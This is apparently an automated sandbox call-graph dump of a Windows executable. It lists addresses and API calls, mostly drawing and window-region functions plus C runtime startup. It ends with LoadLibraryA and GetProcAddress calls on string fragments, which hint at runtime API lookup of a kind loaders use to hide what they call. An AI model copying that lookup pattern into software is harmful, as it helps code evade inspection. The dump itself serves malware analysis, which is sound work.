4028f1 CopyRect 3127->3128 3412 404850 3128->3412 3130 402911 CopyRect 3131 403e10 7 API calls 3130->3131 3132 402931 CopyRect 3131->3132 3413 404850 3132->3413 3134 402951 CopyRect 3135 403e10 7 API calls 3134->3135 3136 402971 CopyRect 3135->3136 3414 404850 3136->3414 3138 402991 CopyRect 3139 403e10 7 API calls 3138->3139 3140 4029b1 CopyRect 3139->3140 3415 404850 3140->3415 3142 4029d1 CopyRect 3143 403e10 7 API calls 3142->3143 3144 4029f1 CopyRect 3143->3144 3416 404850 3144->3416 3146 402a11 CopyRect 3147 403e10 7 API calls 3146->3147 3148 402a31 CopyRect 3147->3148 3417 404850 3148->3417 3150 402a51 CopyRect 3151 403e10 7 API calls 3150->3151 3152 402a71 CopyRect 3151->3152 3418 404850 3152->3418 3154 402a91 CopyRect 3155 403e10 7 API calls 3154->3155 3156 402ab1 CopyRect 3155->3156 3419 404850 3156->3419 3158 402ad1 CopyRect 3159 403e10 7 API calls 3158->3159 3160 402af1 CopyRect 3159->3160 3420 404850 3160->3420 3162 402b11 CopyRect 3163 403e10 7 API calls 3162->3163 3164 402b31 CopyRect 3163->3164 3421 404850 3164->3421 3166 402b51 CopyRect 3167 403e10 7 API calls 3166->3167 3168 402b71 CopyRect 3167->3168 3422 404850 3168->3422 3170 402b91 CopyRect 3171 403e10 7 API calls 3170->3171 3172 402bb1 CopyRect 3171->3172 3423 404850 3172->3423 3174 402bd1 CopyRect 3175 403e10 7 API calls 3174->3175 3176 402bf1 CopyRect 3175->3176 3424 404850 3176->3424 3178 402c11 CopyRect 3179 403e10 7 API calls 3178->3179 3180 402c31 CopyRect 3179->3180 3425 404850 3180->3425 3182 402c51 CopyRect 3183 403e10 7 API calls 3182->3183 3184 402c71 CopyRect 3183->3184 3426 404850 3184->3426 3186 402c91 CopyRect 3187 403e10 7 API calls 3186->3187 3188 402cb1 CopyRect 3187->3188 3427 404850 3188->3427 3190 402cd1 CopyRect 3191 403e10 7 API calls 3190->3191 3192 402cf1 CopyRect 3191->3192 3428 404850 3192->3428 3194 402d11 CopyRect 3195 403e10 7 API calls 3194->3195 3196 402d31 CopyRect 3195->3196 3429 404850 3196->3429 3198 402d51 CopyRect 3199 403e10 7 API calls 3198->3199 3200 402d71 CopyRect 3199->3200 3430 404850 3200->3430 3202 402d91 CopyRect 3203 403e10 7 API calls 3202->3203 3204 402db1 CopyRect 3203->3204 3431 404850 3204->3431 3206 402dd1 CopyRect 3207 403e10 7 API calls 3206->3207 3208 402df1 CopyRect 3207->3208 3432 404850 3208->3432 3210 402e11 CopyRect 3211 403e10 7 API calls 3210->3211 3212 402e31 CopyRect 3211->3212 3433 404850 3212->3433 3214 402e51 CopyRect 3215 403e10 7 API calls 3214->3215 3216 402e71 CopyRect 3215->3216 3434 404850 3216->3434 3218 402e91 CopyRect 3219 403e10 7 API calls 3218->3219 3220 402eb1 CopyRect 3219->3220 3435 404850 3220->3435 3222 402ed1 CopyRect 3223 403e10 7 API calls 3222->3223 3224 402ef1 CopyRect 3223->3224 3436 404850 3224->3436 3226 402f11 CopyRect 3227 403e10 7 API calls 3226->3227 3228 402f31 CopyRect 3227->3228 3437 404850 3228->3437 3230 402f51 CopyRect 3231 403e10 7 API calls 3230->3231 3232 402f71 CopyRect 3231->3232 3438 404850 3232->3438 3234 402f91 CopyRect 3235 403e10 7 API calls 3234->3235 3236 402fb1 CopyRect 3235->3236 3439 404850 3236->3439 3238 402fd1 CopyRect 3239 403e10 7 API calls 3238->3239 3240 402ff1 CopyRect 3239->3240 3440 404850 3240->3440 3242 403011 CopyRect 3243 403e10 7 API calls 3242->3243 3244 403031 CopyRect 3243->3244 3441 404850 3244->3441 3246 403051 CopyRect 3247 403e10 7 API calls 3246->3247 3248 403071 CopyRect 3247->3248 3442 404850 3248->3442 3250 403091 CopyRect 3251 403e10 7 API calls 3250->3251 3252 4030b1 CopyRect 3251->3252 3443 404850 3252->3443 3254 4030d1 CopyRect 3255 403e10 7 API calls 3254->3255 3256 4030f1 CopyRect 3255->3256 3444 404850 3256->3444 3258 403111 CopyRect 3259 403e10 7 API calls 3258->3259 3260 403131 CopyRect 3259->3260 3445 404850 3260->3445 3262 403151 CopyRect 3263 403e10 7 API calls 3262->3263 3264 403171 CopyRect 3263->3264 3446 404850 3264->3446 3266 403191 CopyRect 3267 403e10 7 API calls 3266->3267 3268 4031b1 CopyRect 3267->3268 3447 404850 3268->3447 3270 4031d1 CopyRect 3271 403e10 7 API calls 3270->3271 3272 4031f1 CopyRect 3271->3272 3448 404850 3272->3448 3274 403211 CopyRect 3275 403e10 7 API calls 3274->3275 3276 403231 CopyRect 3275->3276 3449 404850 3276->3449 3278 403251 CopyRect 3279 403e10 7 API calls 3278->3279 3280 403271 CopyRect 3279->3280 3450 404850 3280->3450 3282 403291 CopyRect 3283 403e10 7 API calls 3282->3283 3284 4032b1 CopyRect 3283->3284 3451 404850 3284->3451 3286 4032d1 CopyRect 3287 403e10 7 API calls 3286->3287 3288 4032f1 CopyRect 3287->3288 3452 404850 3288->3452 3290 403311 CopyRect 3291 403e10 7 API calls 3290->3291 3292 403331 CopyRect 3291->3292 3453 404850 3292->3453 3294 403351 CopyRect 3295 403e10 7 API calls 3294->3295 3296 403371 CopyRect 3295->3296 3454 404850 3296->3454 3298 403391 CopyRect 3299 403e10 7 API calls 3298->3299 3300 4033b1 CopyRect 3299->3300 3455 404850 3300->3455 3302 4033d1 CopyRect 3303 403e10 7 API calls 3302->3303 3304 4033f1 CopyRect 3303->3304 3456 404850 3304->3456 3306 403411 CopyRect 3307 403e10 7 API calls 3306->3307 3308 403431 CopyRect 3307->3308 3457 404850 3308->3457 3310 403451 CopyRect 3311 403e10 7 API calls 3310->3311 3312 403471 CopyRect 3311->3312 3458 404850 3312->3458 3314 403491 CopyRect 3315 403e10 7 API calls 3314->3315 3316 4034b1 CopyRect 3315->3316 3459 404850 3316->3459 3318 4034d1 CopyRect 3319 403e10 7 API calls 3318->3319 3320 4034f1 CopyRect 3319->3320 3460 404850 3320->3460 3322 403511 CopyRect 3323 403e10 7 API calls 3322->3323 3324 403531 CopyRect 3323->3324 3461 404850 3324->3461 3326 403551 CopyRect 3327 403e10 7 API calls 3326->3327 3328 403571 CopyRect 3327->3328 3462 404850 3328->3462 3330 403591 CopyRect 3331 403e10 7 API calls 3330->3331 3332 4035b1 CopyRect 3331->3332 3463 404850 3332->3463 3334 4035d1 CopyRect 3335 403e10 7 API calls 3334->3335 3336 4035f1 CopyRect 3335->3336 3464 404850 3336->3464 3338 403611 CopyRect 3339 403e10 7 API calls 3338->3339 3340 403631 CopyRect 3339->3340 3465 404850 3340->3465 3342 403651 CopyRect 3343 403e10 7 API calls 3342->3343 3344 403671 CopyRect 3343->3344 3345 403e10 7 API calls 3344->3345 3346 403691 CopyRect 3345->3346 3466 404360 3346->3466 3348 4036b1 CopyRect 3349 403e10 7 API calls 3348->3349 3350 4036d1 CopyRect 3349->3350 3351 404360 7 API calls 3350->3351 3352 4036f1 CopyRect 3351->3352 3353 403e10 7 API calls 3352->3353 3354 403711 CopyRect 3353->3354 3355 404360 7 API calls 3354->3355 3356 403731 CopyRect 3355->3356 3357 404360 7 API calls 3356->3357 3358 403751 CopyRect 3357->3358 3359 403e10 7 API calls 3358->3359 3360 403771 CopyRect 3359->3360 3361 404360 7 API calls 3360->3361 3362 403791 CopyRect 3361->3362 3363 403e10 7 API calls 3362->3363 3364 4037b1 CopyRect 3363->3364 3365 404360 7 API calls 3364->3365 3366 4037d1 CopyRect 3365->3366 3367 403e10 7 API calls 3366->3367 3368 4037f1 CopyRect 3367->3368 3369 404360 7 API calls 3368->3369 3370 403811 CopyRect 3369->3370 3371 404360 7 API calls 3370->3371 3372 403831 CopyRect 3371->3372 3373 404360 7 API calls 3372->3373 3374 403851 CopyRect 3373->3374 3375 403e10 7 API calls 3374->3375 3376 403871 CopyRect 3375->3376 3377 403e10 7 API calls 3376->3377 3378 403891 CopyRect 3377->3378 3379 404360 7 API calls 3378->3379 3380 4038b1 CopyRect 3379->3380 3381 403e10 7 API calls 3380->3381 3382 4038d1 CopyRect 3381->3382 3383 403e10 7 API calls 3382->3383 3384 4038f1 CopyRect 3383->3384 3385 404360 7 API calls 3384->3385 3386 403911 CopyRect 3385->3386 3387 404360 7 API calls 3386->3387 3388 403931 CopyRect 3387->3388 3389 403e10 7 API calls 3388->3389 3390 403951 CopyRect 3389->3390 3391 404360 7 API calls 3390->3391 3392 403971 CopyRect 3391->3392 3393 404360 7 API calls 3392->3393 3394 403991 CopyRect 3393->3394 3395 404360 7 API calls 3394->3395 3396 4039b1 SetWindowRgn SetCapture 3395->3396 3396->3064 3397->3070 3398->3074 3399->3078 3400->3082 3401->3086 3402->3090 3403->3094 3404->3098 3405->3102 3406->3106 3407->3110 3408->3114 3409->3118 3410->3122 3411->3126 3412->3130 3413->3134 3414->3138 3415->3142 3416->3146 3417->3150 3418->3154 3419->3158 3420->3162 3421->3166 3422->3170 3423->3174 3424->3178 3425->3182 3426->3186 3427->3190 3428->3194 3429->3198 3430->3202 3431->3206 3432->3210 3433->3214 3434->3218 3435->3222 3436->3226 3437->3230 3438->3234 3439->3238 3440->3242 3441->3246 3442->3250 3443->3254 3444->3258 3445->3262 3446->3266 3447->3270 3448->3274 3449->3278 3450->3282 3451->3286 3452->3290 3453->3294 3454->3298 3455->3302 3456->3306 3457->3310 3458->3314 3459->3318 3460->3322 3461->3326 3462->3330 3463->3334 3464->3338 3465->3342 3467 4043a3 3466->3467 3468 40454a 3467->3468 3472 4044e9 _ftol _ftol 3467->3472 3469 404560 CreatePolygonRgn 3468->3469 3470 4045cb CreatePolygonRgn 3468->3470 3471 404570 3469->3471 3476 4045d9 3470->3476 3473 40457b CombineRgn CreatePolygonRgn 3471->3473 3472->3468 3472->3472 3474 40ae02 3473->3474 3475 40459f CombineRgn 3474->3475 3475->3476 3476->3348 3478 40a940 GetWindowRect 3479 40aa54 ClientToScreen 3478->3479 3480 40a99f 3478->3480 3482 40aa52 3479->3482 3480->3482 3490 4052c0 CopyRect 3480->3490 3483 40a9d0 _ftol 3483->3482 3484 40a9ec 3483->3484 3484->3482 3485 40aa08 GetWindowRect 3484->3485 3486 40aa1f 3485->3486 3487 405300 42 API calls 3486->3487 3488 40aa30 SetWindowRgn 3487->3488 3491 40a440 IsIconic 3488->3491 3490->3483 3492 40a474 3491->3492 3494 40a50d 3491->3494 3493 40a481 SendMessageA GetSystemMetrics GetSystemMetrics GetClientRect DrawIcon 3492->3493 3508 40a508 3493->3508 3495 40a593 CreateCompatibleDC 3494->3495 3507 40a640 3494->3507 3494->3508 3496 40b05a 3495->3496 3498 40a5b2 LPtoDP CreateCompatibleBitmap 3496->3498 3497 40a65a GetWindowRect 3499 40a67d 3497->3499 3500 40a5ef 3498->3500 3509 404a40 CopyRect 3499->3509 3503 40a5fd GetMapMode 3500->3503 3502 40a68e 3505 40a6ad BitBlt 3502->3505 3502->3508 3504 40b054 3503->3504 3506 40a616 DPtoLP 3504->3506 3505->3508 3506->3507 3507->3497 3508->3482 3510 4039c0 3 API calls 3509->3510 3511 404a71 CopyRect 3510->3511 3512 4039c0 3 API calls 3511->3512 3513 404a91 CopyRect 3512->3513 3514 4039c0 3 API calls 3513->3514 3515 404ab1 CopyRect 3514->3515 3516 4039c0 3 API calls 3515->3516 3517 404ad1 CopyRect 3516->3517 3518 4039c0 3 API calls 3517->3518 3519 404af1 CopyRect 3518->3519 3520 4039c0 3 API calls 3519->3520 3521 404b11 CopyRect 3520->3521 3522 4039c0 3 API calls 3521->3522 3523 404b31 CopyRect 3522->3523 3524 4039c0 3 API calls 3523->3524 3525 404b51 CopyRect 3524->3525 3526 4039c0 3 API calls 3525->3526 3527 404b71 CopyRect 3526->3527 3528 4039c0 3 API calls 3527->3528 3529 404b91 CopyRect 3528->3529 3530 4039c0 3 API calls 3529->3530 3531 404bb1 CopyRect 3530->3531 3532 4039c0 3 API calls 3531->3532 3533 404bd1 CopyRect 3532->3533 3534 4039c0 3 API calls 3533->3534 3535 404bf1 CopyRect 3534->3535 3536 4039c0 3 API calls 3535->3536 3537 404c11 CopyRect 3536->3537 3538 4039c0 3 API calls 3537->3538 3539 404c31 CopyRect 3538->3539 3540 4039c0 3 API calls 3539->3540 3541 404c51 CopyRect 3540->3541 3542 4039c0 3 API calls 3541->3542 3543 404c71 CopyRect 3542->3543 3544 4039c0 3 API calls 3543->3544 3545 404c91 CopyRect 3544->3545 3546 4039c0 3 API calls 3545->3546 3547 404cb1 CopyRect 3546->3547 3548 4039c0 3 API calls 3547->3548 3549 404cd1 CopyRect 3548->3549 3550 4039c0 3 API calls 3549->3550 3551 404cf1 CopyRect 3550->3551 3552 4039c0 3 API calls 3551->3552 3553 404d11 CopyRect 3552->3553 3554 4039c0 3 API calls 3553->3554 3555 404d31 CopyRect 3554->3555 3556 4039c0 3 API calls 3555->3556 3557 404d51 CopyRect 3556->3557 3558 4039c0 3 API calls 3557->3558 3559 404d71 CopyRect 3558->3559 3560 4039c0 3 API calls 3559->3560 3561 404d91 CopyRect 3560->3561 3562 4039c0 3 API calls 3561->3562 3563 404db1 CopyRect 3562->3563 3564 4039c0 3 API calls 3563->3564 3565 404dd1 CopyRect 3564->3565 3566 4039c0 3 API calls 3565->3566 3567 404df1 CopyRect 3566->3567 3568 4039c0 3 API calls 3567->3568 3569 404e11 CopyRect 3568->3569 3570 4039c0 3 API calls 3569->3570 3571 404e31 CopyRect 3570->3571 3572 4039c0 3 API calls 3571->3572 3573 404e51 CopyRect 3572->3573 3574 4039c0 3 API calls 3573->3574 3575 404e71 CopyRect 3574->3575 3576 4039c0 3 API calls 3575->3576 3577 404e91 CopyRect 3576->3577 3578 4039c0 3 API calls 3577->3578 3579 404eb1 3578->3579 3579->3502 3588 40ad00 DrawTextA 2567 40b10f __set_app_type __p__fmode __p__commode 2568 40b17e 2567->2568 2569 40b192 2568->2569 2570 40b186 __setusermatherr 2568->2570 2579 40b280 _controlfp 2569->2579 2570->2569 2572 40b197 _initterm __getmainargs _initterm 2573 40b1eb GetStartupInfoA 2572->2573 2575 40b21f GetModuleHandleA 2573->2575 2580 40b2a2 69CE4ED0 2575->2580 2578 40b243 exit _XcptFilter 2579->2572 2580->2578 2581 40ac50 TextOutA 2583 40a810 2587 409c60 2583->2587 2585 40a838 ReleaseCapture GetWindowRect 2586 40a863 2585->2586 2588 409c6c 2587->2588 2588->2585 2589 40ac10 PtVisible 3602 40a190 3603 40a198 ReleaseCapture 3602->3603 2590 409e20 2591 409e47 2590->2591 2592 409eaf CreateCompatibleDC 2591->2592 2604 409f5c 2591->2604 2594 40b05a 2592->2594 2593 409f76 GetWindowRect 2595 409f99 2593->2595 2596 409ece LPtoDP CreateCompatibleBitmap 2594->2596 2606 401040 CopyRect 2595->2606 2597 409f0b 2596->2597 2600 409f19 GetMapMode 2597->2600 2599 409fab 2603 409fc3 BitBlt 2599->2603 2605 40a009 2599->2605 2601 40b054 2600->2601 2602 409f32 DPtoLP 2601->2602 2602->2604 2603->2605 2604->2593 2937 4039c0 2606->2937 2608 401071 CopyRect 2943 404670 2608->2943 2610 401091 CopyRect 2611 4039c0 3 API calls 2610->2611 2612 4010b1 CopyRect 2611->2612 2613 404670 3 API calls 2612->2613 2614 4010d1 CopyRect 2613->2614 2615 4039c0 3 API calls 2614->2615 2616 4010f1 CopyRect 2615->2616 2617 404670 3 API calls 2616->2617 2618 401111 CopyRect 2617->2618 2619 4039c0 3 API calls 2618->2619 2620 401131 CopyRect 2619->2620 2621 404670 3 API calls 2620->2621 2622 401151 CopyRect 2621->2622 2623 4039c0 3 API calls 2622->2623 2624 401171 CopyRect 2623->2624 2625 404670 3 API calls 2624->2625 2626 401191 CopyRect 2625->2626 2627 4039c0 3 API calls 2626->2627 2628 4011b1 CopyRect 2627->2628 2629 404670 3 API calls 2628->2629 2630 4011d1 CopyRect 2629->2630 2631 4039c0 3 API calls 2630->2631 2632 4011f1 CopyRect 2631->2632 2633 404670 3 API calls 2632->2633 2634 401211 CopyRect 2633->2634 2635 4039c0 3 API calls 2634->2635 2636 401231 CopyRect 2635->2636 2637 404670 3 API calls 2636->2637 2638 401251 CopyRect 2637->2638 2639 4039c0 3 API calls 2638->2639 2640 401271 CopyRect 2639->2640 2641 404670 3 API calls 2640->2641 2642 401291 CopyRect 2641->2642 2643 4039c0 3 API calls 2642->2643 2644 4012b1 CopyRect 2643->2644 2645 404670 3 API calls 2644->2645 2646 4012d1 CopyRect 2645->2646 2647 4039c0 3 API calls 2646->2647 2648 4012f1 CopyRect 2647->2648 2649 404670 3 API calls 2648->2649 2650 401311 CopyRect 2649->2650 2651 4039c0 3 API calls 2650->2651 2652 401331 CopyRect 2651->2652 2653 404670 3 API calls 2652->2653 2654 401351 CopyRect 2653->2654 2655 4039c0 3 API calls 2654->2655 2656 401371 CopyRect 2655->2656 2657 404670 3 API calls 2656->2657 2658 401391 CopyRect 2657->2658 2659 4039c0 3 API calls 2658->2659 2660 4013b1 CopyRect 2659->2660 2661 404670 3 API calls 2660->2661 2662 4013d1 CopyRect 2661->2662 2663 4039c0 3 API calls 2662->2663 2664 4013f1 CopyRect 2663->2664 2665 404670 3 API calls 2664->2665 2666 401411 CopyRect 2665->2666 2667 4039c0 3 API calls 2666->2667 2668 401431 CopyRect 2667->2668 2669 404670 3 API calls 2668->2669 2670 401451 CopyRect 2669->2670 2671 4039c0 3 API calls 2670->2671 2672 401471 CopyRect 2671->2672 2673 404670 3 API calls 2672->2673 2674 401491 CopyRect 2673->2674 2675 4039c0 3 API calls 2674->2675 2676 4014b1 CopyRect 2675->2676 2677 404670 3 API calls 2676->2677 2678 4014d1 CopyRect 2677->2678 2679 4039c0 3 API calls 2678->2679 2680 4014f1 CopyRect 2679->2680 2681 404670 3 API calls 2680->2681 2682 401511 CopyRect 2681->2682 2683 4039c0 3 API calls 2682->2683 2684 401531 CopyRect 2683->2684 2685 404670 3 API calls 2684->2685 2686 401551 CopyRect 2685->2686 2687 4039c0 3 API calls 2686->2687 2688 401571 CopyRect 2687->2688 2689 404670 3 API calls 2688->2689 2690 401591 CopyRect 2689->2690 2691 4039c0 3 API calls 2690->2691 2692 4015b1 CopyRect 2691->2692 2693 404670 3 API calls 2692->2693 2694 4015d1 CopyRect 2693->2694 2695 4039c0 3 API calls 2694->2695 2696 4015f1 CopyRect 2695->2696 2697 404670 3 API calls 2696->2697 2698 401611 CopyRect 2697->2698 2699 4039c0 3 API calls 2698->2699 2700 401631 CopyRect 2699->2700 2701 404670 3 API calls 2700->2701 2702 401651 CopyRect 2701->2702 2703 4039c0 3 API calls 2702->2703 2704 401671 CopyRect 2703->2704 2705 404670 3 API calls 2704->2705 2706 401691 CopyRect 2705->2706 2707 4039c0 3 API calls 2706->2707 2708 4016b1 CopyRect 2707->2708 2709 404670 3 API calls 2708->2709 2710 4016d1 CopyRect 2709->2710 2711 4039c0 3 API calls 2710->2711 2712 4016f1 CopyRect 2711->2712 2713 404670 3 API calls 2712->2713 2714 401711 CopyRect 2713->2714 2715 4039c0 3 API calls 2714->2715 2716 401731 CopyRect 2715->2716 2717 404670 3 API calls 2716->2717 2718 401751 CopyRect 2717->2718 2719 4039c0 3 API calls 2718->2719 2720 401771 CopyRect 2719->2720 2721 404670 3 API calls 2720->2721 2722 401791 CopyRect 2721->2722 2723 4039c0 3 API calls 2722->2723 2724 4017b1 CopyRect 2723->2724 2725 404670 3 API calls 2724->2725 2726 4017d1 CopyRect 2725->2726 2727 4039c0 3 API calls 2726->2727 2728 4017f1 CopyRect 2727->2728 2729 404670 3 API calls 2728->2729 2730 401811 CopyRect 2729->2730 2731 4039c0 3 API calls 2730->2731 2732 401831 CopyRect 2731->2732 2733 404670 3 API calls 2732->2733 2734 401851 CopyRect 2733->2734 2735 4039c0 3 API calls 2734->2735 2736 401871 CopyRect 2735->2736 2737 404670 3 API calls 2736->2737 2738 401891 CopyRect 2737->2738 2739 4039c0 3 API calls 2738->2739 2740 4018b1 CopyRect 2739->2740 2741 404670 3 API calls 2740->2741 2742 4018d1 CopyRect 2741->2742 2743 4039c0 3 API calls 2742->2743 2744 4018f1 CopyRect 2743->2744 2745 404670 3 API calls 2744->2745 2746 401911 CopyRect 2745->2746 2747 4039c0 3 API calls 2746->2747 2748 401931 CopyRect 2747->2748 2749 404670 3 API calls 2748->2749 2750 401951 CopyRect 2749->2750 2751 4039c0 3 API calls 2750->2751 2752 401971 CopyRect 2751->2752 2753 404670 3 API calls 2752->2753 2754 401991 CopyRect 2753->2754 2755 4039c0 3 API calls 2754->2755 2756 4019b1 CopyRect 2755->2756 2757 404670 3 API calls 2756->2757 2758 4019d1 CopyRect 2757->2758 2759 4039c0 3 API calls 2758->2759 2760 4019f1 CopyRect 2759->2760 2761 404670 3 API calls 2760->2761 2762 401a11 CopyRect 2761->2762 2763 4039c0 3 API calls 2762->2763 2764 401a31 CopyRect 2763->2764 2765 404670 3 API calls 2764->2765 2766 401a51 CopyRect 2765->2766 2767 4039c0 3 API calls 2766->2767 2768 401a71 CopyRect 2767->2768 2769 404670 3 API calls 2768->2769 2770 401a91 CopyRect 2769->2770 2771 4039c0 3 API calls 2770->2771 2772 401ab1 CopyRect 2771->2772 2773 404670 3 API calls 2772->2773 2774 401ad1 CopyRect 2773->2774 2775 4039c0 3 API calls 2774->2775 2776 401af1 CopyRect 2775->2776 2777 404670 3 API calls 2776->2777 2778 401b11 CopyRect 2777->2778 2779 4039c0 3 API calls 2778->2779 2780 401b31 CopyRect 2779->2780 2781 404670 3 API calls 2780->2781 2782 401b51 CopyRect 2781->2782 2783 4039c0 3 API calls 2782->2783 2784 401b71 CopyRect 2783->2784 2785 404670 3 API calls 2784->2785 2786 401b91 CopyRect 2785->2786 2787 4039c0 3 API calls 2786->2787 2788 401bb1 CopyRect 2787->2788 2789 404670 3 API calls 2788->2789 2790 401bd1 CopyRect 2789->2790 2791 4039c0 3 API calls 2790->2791 2792 401bf1 CopyRect 2791->2792 2793 404670 3 API calls 2792->2793 2794 401c11 CopyRect 2793->2794 2795 4039c0 3 API calls 2794->2795 2796 401c31 CopyRect 2795->2796 2797 404670 3 API calls 2796->2797 2798 401c51 CopyRect 2797->2798 2799 4039c0 3 API calls 2798->2799 2800 401c71 CopyRect 2799->2800 2801 404670 3 API calls 2800->2801 2802 401c91 CopyRect 2801->2802 2803 4039c0 3 API calls 2802->2803 2804 401cb1 CopyRect 2803->2804 2805 404670 3 API calls 2804->2805 2806 401cd1 CopyRect 2805->2806 2807 4039c0 3 API calls 2806->2807 2808 401cf1 CopyRect 2807->2808 2809 404670 3 API calls 2808->2809 2810 401d11 CopyRect 2809->2810 2811 4039c0 3 API calls 2810->2811 2812 401d31 CopyRect 2811->2812 2813 404670 3 API calls 2812->2813 2814 401d51 CopyRect 2813->2814 2815 4039c0 3 API calls 2814->2815 2816 401d71 CopyRect 2815->2816 2817 404670 3 API calls 2816->2817 2818 401d91 CopyRect 2817->2818 2819 4039c0 3 API calls 2818->2819 2820 401db1 CopyRect 2819->2820 2821 404670 3 API calls 2820->2821 2822 401dd1 CopyRect 2821->2822 2823 4039c0 3 API calls 2822->2823 2824 401df1 CopyRect 2823->2824 2825 404670 3 API calls 2824->2825 2826 401e11 CopyRect 2825->2826 2827 4039c0 3 API calls 2826->2827 2828 401e31 CopyRect 2827->2828 2829 404670 3 API calls 2828->2829 2830 401e51 CopyRect 2829->2830 2831 4039c0 3 API calls 2830->2831 2832 401e71 CopyRect 2831->2832 2833 404670 3 API calls 2832->2833 2834 401e91 CopyRect 2833->2834 2835 4039c0 3 API calls 2834->2835 2836 401eb1 CopyRect 2835->2836 2837 404670 3 API calls 2836->2837 2838 401ed1 CopyRect 2837->2838 2839 4039c0 3 API calls 2838->2839 2840 401ef1 CopyRect 2839->2840 2841 404670 3 API calls 2840->2841 2842 401f11 CopyRect 2841->2842 2843 4039c0 3 API calls 2842->2843 2844 401f31 CopyRect 2843->2844 2845 404670 3 API calls 2844->2845 2846 401f51 CopyRect 2845->2846 2847 4039c0 3 API calls 2846->2847 2848 401f71 CopyRect 2847->2848 2849 404670 3 API calls 2848->2849 2850 401f91 CopyRect 2849->2850 2851 4039c0 3 API calls 2850->2851 2852 401fb1 CopyRect 2851->2852 2853 404670 3 API calls 2852->2853 2854 401fd1 CopyRect 2853->2854 2855 4039c0 3 API calls 2854->2855 2856 401ff1 CopyRect 2855->2856 2857 404670 3 API calls 2856->2857 2858 402011 CopyRect 2857->2858 2859 4039c0 3 API calls 2858->2859 2860 402031 CopyRect 2859->2860 2861 404670 3 API calls 2860->2861 2862 402051 CopyRect 2861->2862 2863 4039c0 3 API calls 2862->2863 2864 402071 CopyRect 2863->2864 2865 404670 3 API calls 2864->2865 2866 402091 CopyRect 2865->2866 2867 4039c0 3 API calls 2866->2867 2868 4020b1 CopyRect 2867->2868 2869 404670 3 API calls 2868->2869 2870 4020d1 CopyRect 2869->2870 2871 4039c0 3 API calls 2870->2871 2872 4020f1 CopyRect 2871->2872 2873 404670 3 API calls 2872->2873 2874 402111 CopyRect 2873->2874 2875 4039c0 3 API calls 2874->2875 2876 402131 CopyRect 2875->2876 2877 404670 3 API calls 2876->2877 2878 402151 CopyRect 2877->2878 2879 4039c0 3 API calls 2878->2879 2880 402171 CopyRect 2879->2880 2881 404670 3 API calls 2880->2881 2882 402191 CopyRect 2881->2882 2883 4039c0 3 API calls 2882->2883 2884 4021b1 CopyRect 2883->2884 2885 4039c0 3 API calls 2884->2885 2886 4021d1 CopyRect 2885->2886 2949 4040f0 2886->2949 2888 4021f1 CopyRect 2889 4039c0 3 API calls 2888->2889 2890 402211 CopyRect 2889->2890 2891 4040f0 3 API calls 2890->2891 2892 402231 CopyRect 2891->2892 2893 4039c0 3 API calls 2892->2893 2894 402251 CopyRect 2893->2894 2895 4040f0 3 API calls 2894->2895 2896 402271 CopyRect 2895->2896 2897 4040f0 3 API calls 2896->2897 2898 402291 CopyRect 2897->2898 2899 4039c0 3 API calls 2898->2899 2900 4022b1 CopyRect 2899->2900 2901 4040f0 3 API calls 2900->2901 2902 4022d1 CopyRect 2901->2902 2903 4039c0 3 API calls 2902->2903 2904 4022f1 CopyRect 2903->2904 2905 4040f0 3 API calls 2904->2905 2906 402311 CopyRect 2905->2906 2907 4039c0 3 API calls 2906->2907 2908 402331 CopyRect 2907->2908 2909 4040f0 3 API calls 2908->2909 2910 402351 CopyRect 2909->2910 2911 4040f0 3 API calls 2910->2911 2912 402371 CopyRect 2911->2912 2913 4040f0 3 API calls 2912->2913 2914 402391 CopyRect 2913->2914 2915 4039c0 3 API calls 2914->2915 2916 4023b1 CopyRect 2915->2916 2917 4039c0 3 API calls 2916->2917 2918 4023d1 CopyRect 2917->2918 2919 4040f0 3 API calls 2918->2919 2920 4023f1 CopyRect 2919->2920 2921 4039c0 3 API calls 2920->2921 2922 402411 CopyRect 2921->2922 2923 4039c0 3 API calls 2922->2923 2924 402431 CopyRect 2923->2924 2925 4040f0 3 API calls 2924->2925 2926 402451 CopyRect 2925->2926 2927 4040f0 3 API calls 2926->2927 2928 402471 CopyRect 2927->2928 2929 4039c0 3 API calls 2928->2929 2930 402491 CopyRect 2929->2930 2931 4040f0 3 API calls 2930->2931 2932 4024b1 CopyRect 2931->2932 2933 4040f0 3 API calls 2932->2933 2934 4024d1 CopyRect 2933->2934 2935 4040f0 3 API calls 2934->2935 2936 4024f1 2935->2936 2936->2599 2938 4039f4 2937->2938 2939 403b03 _ftol _ftol 2938->2939 2940 403b5e 2938->2940 2942 403bac 2938->2942 2939->2939 2939->2940 2941 403b90 Polygon 2940->2941 2941->2942 2942->2608 2944 4046a5 2943->2944 2945 404776 _ftol _ftol 2944->2945 2946 4047d8 2944->2946 2948 404805 2944->2948 2945->2945 2945->2946 2947 4047eb Polyline 2946->2947 2947->2948 2948->2610 2950 40412b 2949->2950 2951 40423e _ftol _ftol 2950->2951 2952 404299 2950->2952 2954 4042ed 2950->2954 2951->2951 2951->2952 2953 4042c9 PolyPolygon 2952->2953 2953->2954 2954->2888 3604 40ada0 EnableWindow 3605 40a7a0 GetWindowRect 3606 40a7c1 3605->3606 3607 404ec0 24 API calls 3606->3607 3608 40a7e1 SetCapture 3607->3608 3609 40a7f4 3608->3609 2582 40b261 _exit 3047 40b2e3 3048 40b2e8 3047->3048 3051 40b2ba 3048->3051 3052 40b2bf 3051->3052 3053 40b2d4 _setmbcp 3052->3053 3054 40b2dd 3052->3054 3053->3054 2334 405830 2337 40a1b0 2334->2337 2336 405856 2338 40a1d9 2337->2338 2339 40a1fd LoadIconA 2338->2339 2339->2336 2955 40ac30 RectVisible 3477 40acb0 TabbedTextOutA 3580 40a170 3583 40a090 3580->3583 3582 40a178 3584 40a0c8 BitBlt 3583->3584 3586 40a105 3583->3586 3584->3586 3586->3582 3587 40ad70 Escape 3589 40ad30 3590 40ad38 3589->3590 3591 40ad3b GrayStringA 3589->3591 3590->3591 3592 4057f0 3593 4057f5 3592->3593 3596 40b0c8 3593->3596 3599 40b09c 3596->3599 3598 40581a 3600 40b0b1 __dllonexit 3599->3600 3601 40b0a5 _onexit 3599->3601 3600->3598 3601->3598
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004074EA
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407500
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
                                                                        • LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
